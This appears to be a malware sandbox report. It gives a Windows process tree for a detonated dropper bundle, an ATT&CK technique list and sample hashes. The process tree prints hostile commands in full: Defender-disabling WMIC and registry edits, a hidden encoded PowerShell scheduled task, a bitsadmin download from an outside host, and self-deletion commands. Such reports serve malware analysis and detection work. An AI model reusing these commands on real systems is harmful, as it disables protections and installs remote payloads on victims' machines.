          C:\Users\Admin\AppData\Local\Temp\nb2muvf2.k0k\anyname.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\nb2muvf2.k0k\anyname.exe
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\garwqvxo.knk\offer.exe & exit
          C:\Users\Admin\AppData\Local\Temp\garwqvxo.knk\offer.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\garwqvxo.knk\offer.exe
            - Executes dropped EXE
            C:\Users\Admin\AppData\Local\Temp\Enaxl.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\Enaxl.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
              C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /pid 6840 & erase C:\Users\Admin\AppData\Local\Temp\Enaxl.exe & RD /S /Q C:\\ProgramData\\212894592005830\\* & exit
                C:\Windows\System32\Conhost.exe
                  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  - Executes dropped EXE
                  - Loads dropped DLL
                C:\Windows\SysWOW64\taskkill.exe
                  cmdline: taskkill /pid 6840
                  - Kills process with taskkill
            C:\Users\Admin\AppData\Local\Temp\Wyexnknyu.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\Wyexnknyu.exe"
              - Executes dropped EXE
              C:\Users\Admin\AppData\Local\Temp\7zS58A0.tmp\Install.exe
                cmdline: .\Install.exe
                - Executes dropped EXE
                - Checks SCSI registry key(s)
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: MapViewOfSection
                C:\Users\Admin\AppData\Local\Temp\7zS5FE4.tmp\Install.exe
                  cmdline: .\Install.exe /S /site_id "739435"
                  - Executes dropped EXE
                  - Checks BIOS information in registry
                  - Drops file in System32 directory
                  - Enumerates system info in registry
                  C:\Windows\SysWOW64\cmd.exe
                    cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                    C:\Windows\SysWOW64\forfiles.exe
                      cmdline: forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                      C:\Windows\SysWOW64\cmd.exe
                        cmdline: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          cmdline: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\Wbem\WMIC.exe
                            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                    C:\Windows\SysWOW64\forfiles.exe
                      cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                      C:\Windows\SysWOW64\cmd.exe
                        cmdline: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          cmdline: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\Wbem\WMIC.exe
                            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                    C:\Windows\SysWOW64\forfiles.exe
                      cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                      C:\Windows\SysWOW64\cmd.exe
                        cmdline: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          cmdline: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\Wbem\WMIC.exe
                            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                    C:\Windows\SysWOW64\forfiles.exe
                      cmdline: forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                      C:\Windows\SysWOW64\cmd.exe
                        cmdline: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          cmdline: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                          C:\Windows\SysWOW64\Wbem\WMIC.exe
                            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                  C:\Windows\SysWOW64\forfiles.exe
                    cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                    C:\Windows\SysWOW64\cmd.exe
                      cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                      \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                      \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                  C:\Windows\SysWOW64\forfiles.exe
                    cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                    C:\Windows\SysWOW64\cmd.exe
                      cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                      \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                      \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /CREATE /TN "gSzceyuEo" /SC once /ST 06:59:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                    - Creates scheduled task(s)
                    C:\Windows\System32\Conhost.exe
                      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      - Executes dropped EXE
                      - Suspicious use of SetThreadContext
                  C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /run /I /tn "gSzceyuEo"
                  C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /DELETE /F /TN "gSzceyuEo"
                  C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 10:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\kxXwdCM.exe\" tt /site_id 739435 /S" /V1 /F
                    - Drops file in Windows directory
                    - Creates scheduled task(s)
                    C:\Windows\System32\Conhost.exe
                      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /run /I /tn "bOoGaaDxESFbryPOAb"
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pjifjvbg.bd1\Atomic.exe & exit
          C:\Users\Admin\AppData\Local\Temp\pjifjvbg.bd1\Atomic.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\pjifjvbg.bd1\Atomic.exe
            - Executes dropped EXE
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hr4oqecv.otc\gcleaner.exe /mixfive & exit
          C:\Users\Admin\AppData\Local\Temp\hr4oqecv.otc\gcleaner.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\hr4oqecv.otc\gcleaner.exe /mixfive
            - Executes dropped EXE
        C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwxiqxte.igg\autosubplayer.exe /S & exit
          C:\Users\Admin\AppData\Local\Temp\rwxiqxte.igg\autosubplayer.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\rwxiqxte.igg\autosubplayer.exe /S
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in Program Files directory
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
              C:\Windows\System32\Conhost.exe
                cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\bitsadmin.exe
              cmdline: "bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
              - Download via BitsAdmin
            C:\Program Files (x86)\lighteningplayer\data_load.exe
              cmdline: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pF1Cp7aJwiPoTuRt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
            C:\Program Files (x86)\lighteningplayer\data_load.exe
              cmdline: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNSkZ1CRlSRuMwfs -y x C:\zip.7z -o"C:\Program Files\temp_files\"
              - Drops file in Program Files directory
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\rundll32.exe
              cmdline: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz
              C:\Windows\system32\rundll32.exe
                cmdline: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz
                - Drops file in System32 directory
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw640C.tmp\tempfile.ps1"
            C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
              cmdline: "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
C:\Windows\system32\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  - Executes dropped EXE
C:\Windows\system32\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe
    cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    - Modifies registry class
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
  cmdline: C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\system32\msiexec.exe
  cmdline: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  C:\Windows\syswow64\MsiExec.exe
    cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6850A2AF3DB752004D610004088FF031 C
    - Loads dropped DLL
  C:\Windows\syswow64\MsiExec.exe
    cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DF757AFB3E66B128A47D430E7FA203E0
    C:\Windows\SysWOW64\taskkill.exe
      cmdline: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
      - Kills process with taskkill
  C:\Windows\syswow64\MsiExec.exe
    cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0C514077A3F91FD6A727CF662BEB85BB E Global\MSI0000
    - Loads dropped DLL
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
C:\Windows\system32\rundll32.exe
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe
    cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class
C:\Users\Admin\AppData\Local\Temp\F4B2.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\F4B2.exe
C:\Users\Admin\AppData\Local\Temp\B0A0.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\B0A0.exe
  - Writes to the Master Boot Record (MBR)
C:\Users\Admin\AppData\Local\Temp\1E01.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\1E01.exe
C:\Users\Admin\AppData\Local\Temp\7A3B.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\7A3B.exe
  C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im 7A3B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7A3B.exe" & del C:\ProgramData\*.dll & exit
    C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /im 7A3B.exe /f
      - Kills process with taskkill
    C:\Windows\SysWOW64\timeout.exe
      cmdline: timeout /t 6
      - Delays execution with timeout.exe
C:\Users\Admin\AppData\Local\Temp\A53F.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\A53F.exe
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\AppData\Local\Temp\BD5C.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\BD5C.exe
C:\Windows\SysWOW64\explorer.exe
  cmdline: C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
  cmdline: C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
  cmdline: C:\Windows\SysWOW64\explorer.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\browser_broker.exe
  cmdline: C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
C:\Windows\system32\backgroundTaskHost.exe
  cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
\??\c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
\??\c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\browser_broker.exe
  cmdline: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
C:\Windows\system32\compattelrunner.exe
  cmdline: C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
\??\c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Bootkit (1)
- Scheduled Task (1)
- BITS Jobs (1)
Defense Evasion
- Modify Registry (4)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- BITS Jobs (1)
- Install Root Certificate (1)
Downloads
29158d5c6096b12a039400f7ae1eaf0e
SHA1940043fa68cc971b0aa74d4e0833130dad1abc16
SHA25636cc42294d2cac9e45fa389f9a7a1df18cb5af6f68ed2d5e9563bd522f48bc4a
SHA512366f6f7bc8ff07995a273dc28f77f5d43515c9a079d3e64308228e4eba12f32bb7945fc898e8ef9ac02a0f58fdc6ed90f82142d43eec94fe2cf7da80d7b1ad88
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1966fb31dd5a07.exeMD5
29158d5c6096b12a039400f7ae1eaf0e
SHA1940043fa68cc971b0aa74d4e0833130dad1abc16
SHA25636cc42294d2cac9e45fa389f9a7a1df18cb5af6f68ed2d5e9563bd522f48bc4a
SHA512366f6f7bc8ff07995a273dc28f77f5d43515c9a079d3e64308228e4eba12f32bb7945fc898e8ef9ac02a0f58fdc6ed90f82142d43eec94fe2cf7da80d7b1ad88
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun198361825f4.exeMD5
f7ad507592d13a7a2243d264906de671
SHA113e5bfa6cdd1c96b6c9e2170f090e3b260ae95e5
SHA256d5959e437e58709c5e5e7a923efe7351b28bedef15cb00cd9fdb4e5e955b2a13
